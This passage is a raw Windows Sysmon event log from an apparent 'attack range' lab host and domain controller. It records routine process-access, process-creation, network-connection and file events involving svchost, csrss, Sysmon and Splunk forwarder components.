10:38:47.942{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214571Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214570Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214569Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214568Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214567Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214566Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214565Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214564Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214563Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0EB7-6216-0604-000000003902}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214562Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EB7-6216-0604-000000003902}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214561Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.943{4F8D34B0-0EB7-6216-0604-000000003902}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000214560Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.132{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51198-false10.0.1.12-8089- 354300x8000000000000000214559Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:44.479{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51197-false10.0.1.12-8000- 23542300x8000000000000000214558Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.755{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=784E5C13A0E74FB0C33B84A4CD17A5EA,SHA256=B5AC70AA7A363BE979CE59F47C551F27312107494A7EECA885EBF33C5F3CAC12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:47.166{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=468D4B3F2E8B2BF7045E3ABE588400BC,SHA256=CE3EB04B9EE404B0A4C4496F0321E532C93D0C5DDCE7681ABDC07457133C185F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214557Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.676{4F8D34B0-0EB7-6216-0504-000000003902}35964088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214556Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EB7-6216-0504-000000003902}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214555Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214554Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214553Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214552Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214551Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214550Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214549Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214548Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214547Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0EB7-6216-0504-000000003902}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214546Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214545Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.442{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EB7-6216-0504-000000003902}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 